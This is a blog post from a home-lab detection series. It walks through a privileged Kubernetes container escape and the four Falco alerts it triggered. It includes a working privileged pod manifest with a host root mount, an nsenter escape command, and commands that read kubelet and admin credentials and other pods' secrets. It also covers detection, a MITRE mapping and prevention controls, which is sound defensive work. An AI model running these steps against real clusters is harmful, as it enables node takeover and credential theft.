Christopher Azzopardi

Posted on Jun 5 • Edited on Jun 7 • Originally published at Medium

I Escaped a Privileged Kubernetes Container — Here's What Falco Saw

#kubernetes #security #devops #falco

Build Log: Project 1 — K8s SOC Foundation | Attack 2 of 4

The container had root on the node within 90 seconds of starting.

Not root inside the container. Root on the actual Kubernetes node — access to the host filesystem, the kubelet credentials, the node's process table, everything. From inside a pod.

This is the privileged container escape. It's one of the most well-documented Kubernetes attack techniques, it's in every red team playbook for cloud-native environments, and it works exactly as advertised when a cluster isn't hardened against it.

This is Attack 2 in my four-attack detection series. Attack 1 covered cryptominer deployment. This one goes deeper — the impact is higher, the Falco detection is richer, and the evidence trail is more instructive.

Why Privileged Containers Are a Critical Risk

A privileged container runs with privileged: true in its security context. This disables the Linux namespace isolation that normally keeps container processes separated from the host. The container process effectively has the same capabilities as a root process on the node itself.

In practice, this means:

Full access to the host filesystem via /proc/1/ns/mnt
Ability to load and unload kernel modules
Access to raw network interfaces
Visibility into all processes running on the node
Access to node-level credentials — including the kubelet's kubeconfig

Privileged containers have legitimate uses: certain CNI plugins, node-level monitoring agents, some storage drivers. That legitimate use case is exactly why this attack vector persists — misconfigured workloads, copy-pasted manifests, and overly permissive RBAC all create openings.

TeamTNT, Hildegard, and multiple other threat actor groups have used privileged container access as a lateral movement technique against Kubernetes clusters. This isn't theoretical.

MITRE ATT&CK Mapping

Technique ID	Name	What it maps to
T1611	Escape to Host	nsenter into host mount namespace
T1068	Exploitation for Privilege Escalation	privileged flag bypassing namespace isolation
T1552.004	Unsecured Credentials: Credentials in Files	reading kubelet kubeconfig from host filesystem
T1082	System Information Discovery	enumerating host processes and filesystem post-escape
T1078.004	Valid Accounts: Cloud Accounts	using harvested credentials for lateral movement

The Attack

Step 1 — Deploy the Privileged Pod

# attack-02-privileged-escape.yaml
apiVersion: v1
kind: Pod
metadata:
  name: privileged-escape
  namespace: attack-sim
  labels:
    app: node-agent    # Generic label to blend in
spec:
  containers:
  - name: privileged-escape
    image: ubuntu:22.04
    command: ["/bin/bash", "-c", "sleep infinity"]
    securityContext:
      privileged: true        # Full host capabilities
      runAsUser: 0
    volumeMounts:
    - name: host-root
      mountPath: /host         # Host filesystem mounted at /host
  hostPID: true                # Access to host PID namespace
  hostNetwork: true            # Access to host network namespace
  volumes:
  - name: host-root
    hostPath:
      path: /                  # Entire host filesystem

kubectl apply -f attack-02-privileged-escape.yaml
kubectl exec -it privileged-escape -n attack-sim -- /bin/bash

The pod starts in seconds. We're inside a container — for now.

Step 2 — Escape to Host via nsenter

# Inside the container
# nsenter jumps into the host's mount namespace using /proc/1
nsenter --mount=/proc/1/ns/mnt --uts=/proc/1/ns/uts \
        --ipc=/proc/1/ns/ipc --net=/proc/1/ns/net \
        --pid=/proc/1/ns/pid -- /bin/bash

We're no longer in the container namespace. We're in the host's namespace. The same node that runs the Kubernetes control plane.

# Verify we're on the host
hostname      # Returns the node hostname, not the pod name
cat /etc/os-release   # Host OS, not container OS
ps aux        # All host processes visible

Step 3 — Harvest Node Credentials

From the host namespace, the kubelet's credentials are readable:

# Kubelet kubeconfig — contains cluster credentials
cat /etc/kubernetes/kubelet.conf

# PKI certificates
ls -la /etc/kubernetes/pki/

# Kubelet client certificate
cat /var/lib/kubelet/pki/kubelet-client-current.pem

# Any kubeadm-stored credentials
cat /etc/kubernetes/admin.conf 2>/dev/null

# Check what the kubelet credential can access
KUBECONFIG=/etc/kubernetes/kubelet.conf kubectl auth can-i --list

The kubelet credential won't have cluster-admin access, but it will have node-level access — enough for further lateral movement, reading secrets mounted to pods on this node, and potentially pivoting to other nodes.

Step 4 — Read Secrets From Host Filesystem

Secrets mounted into pods on this node are accessible directly from the host filesystem:

# Find all mounted secrets on the node
find /host/var/lib/kubelet/pods -name "*.json" 2>/dev/null | head -20

# Read service account tokens from other pods
find /host/var/lib/kubelet/pods -path "*/secrets/*" -type f 2>/dev/null

This is the real impact. The escape gives you access not just to this pod's credentials but to the credentials of every pod running on the same node.

The Detection: What Falco Saw

Four rules fired. In sequence, they tell the complete attack story.

Alert 1 — Privileged Container Launched

This fires at pod start — before any escape attempt:

{
  "output": "Warning Privileged container started 
    (user=root image=ubuntu:22.04 
    k8s.ns=attack-sim k8s.pod.name=privileged-escape 
    container.privileged=true 
    evt.type=container)",
  "priority": "Warning",
  "rule": "Launch Privileged Container",
  "tags": ["container", "mitre_privilege_escalation", "T1068"]
}

A privileged container starting is itself a detection signal — regardless of what happens next. In a hardened cluster, this is where the story should end: the admission controller rejects the manifest and the pod never starts. Here it runs, and Falco immediately surfaces it.

Alert 2 — Host Namespace Entered via nsenter

{
  "output": "Warning Namespace change (setns) by unexpected program 
    (user=root proc.name=nsenter proc.cmdline=nsenter --mount=/proc/1/ns/mnt 
    k8s.ns=attack-sim k8s.pod.name=privileged-escape 
    proc.pname=bash evt.type=setns)",
  "priority": "Warning",
  "rule": "Change thread namespace",
  "tags": ["process", "mitre_privilege_escalation", "T1611"]
}

The setns syscall is what nsenter uses to switch namespaces. Falco watches at the syscall level — it saw the exact moment the escape happened.

Alert 3 — Sensitive File Read From Host

{
  "output": "Warning Sensitive file opened for reading by non-trusted program 
    (user=root proc.name=cat 
    fd.name=/etc/kubernetes/kubelet.conf 
    k8s.ns=attack-sim k8s.pod.name=privileged-escape)",
  "priority": "Warning", 
  "rule": "Read sensitive file untrusted",
  "tags": ["filesystem", "mitre_credential_access", "T1552.004"]
}

Reading kubelet.conf from a container — even one running as root — is abnormal. Falco's sensitive file rules cover a broad set of credential and configuration paths: /etc/kubernetes/, /var/lib/kubelet/pki/, /root/.kube/, and others.

Alert 4 — Container Launched With Sensitive Mount

{
  "output": "Warning Container launched with sensitive mount 
    (user=root image=ubuntu:22.04 
    k8s.pod.name=privileged-escape 
    k8s.ns=attack-sim 
    fd.name=/ mounts=/ 
    evt.type=container)",
  "priority": "Warning",
  "rule": "Launch Sensitive Mount Container",
  "tags": ["container", "mitre_discovery", "T1082"]
}

The host filesystem mount at /host triggered this rule at container start, in parallel with Alert 1. Two separate rules firing simultaneously for the same pod is a strong signal — correlated alerts are harder to explain away as false positives.

The Loki Timeline

{namespace="attack-sim", pod="privileged-escape"} 
  | json 
  | line_format "{{.time}} | {{.priority}} | {{.rule}}"

T+00:00  Pod scheduled
T+00:08  Container started
T+00:09  ALERT: Launch Privileged Container [Warning]
T+00:09  ALERT: Launch Sensitive Mount Container [Warning]
T+00:41  kubectl exec shell opened
T+01:12  ALERT: Change thread namespace — nsenter [Warning]
T+01:34  ALERT: Read sensitive file — kubelet.conf [Warning]
T+01:47  Falcosidekick: Slack notification batch delivered

The first two alerts fire at container start — 33 seconds before we even exec into the pod. By the time we attempted the escape, a real SOC would already have an open incident for a privileged container in the attack-sim namespace.

Comparing Attack 1 and Attack 2

Both attacks were caught. The nature of the detection is different and worth understanding.

The cryptominer (Attack 1) produced behavioural signals: outbound network connection to a mining pool, an unexpected process making external connections. The detection was based on what the container did.

The privileged escape produced structural signals: a container with privileged: true, a host filesystem mount, a namespace-change syscall. The detection was based on what the container was configured to be. Two of the four alerts fired before any malicious action took place.

This distinction matters for defenders. Behavioural detection catches attacks in progress. Structural detection can surface risk before exploitation begins. A mature detection programme needs both.

What Prevention Looks Like (Project 3 Preview)

In Project 3, after CKS, the same manifest gets stopped at the admission controller:

OPA Gatekeeper will reject any pod spec with privileged: true or hostPID: true — the pod never gets scheduled.

Kyverno will enforce a disallow-privileged-containers ClusterPolicy — rejected at the API server before kubeadm even touches it.

Seccomp profiles will block the setns syscall cluster-wide — nsenter fails even if a privileged pod somehow runs.

Three independent layers. The same four Falco alerts become zero because the workload is rejected before it runs. That's the Project 3 story.

Key Takeaways for Defenders

Privileged containers are not just a risk — they're an incident waiting for a trigger. Any workload running with privileged: true that isn't a known, reviewed, explicitly necessary component should be treated as a finding, not a configuration choice.

nsenter is a legitimate admin tool and an attack tool. Most production workloads have no reason to call setns. An alert on this syscall from a non-system namespace is high-fidelity.

The sensitive file rules are undervalued. Falco ships with a comprehensive list of files and paths that should never be read by untrusted processes. Tuning these rules to your environment — whitelisting known-good readers — dramatically improves their signal-to-noise ratio.

Two correlated alerts at container start beat one alert during exploitation. If your detection only fires after the escape happens, you're already behind. Structural signals at admission time give you the lead.

What's Next

Attack 3 covers service account token abuse — harvesting the default service account token mounted into a pod and using it to query the Kubernetes API for cluster intelligence. It's quieter than the privileged escape, harder to spot without the right rules, and maps directly to how real attackers move laterally through a compromised cluster.

Full manifests, Falco alert captures, and Loki query examples are in the repo: github.com/chrisazzo/k8s-soc-foundation

I'm building a DevSecOps portfolio targeting AI Security Architect contract work. Follow for Attacks 3 and 4, the hardening post, and the CKS build log.

← Previous: Attack 1 — Cryptominer Deployment

Next: Attack 3 — Service Account Token Abuse →

DEV Community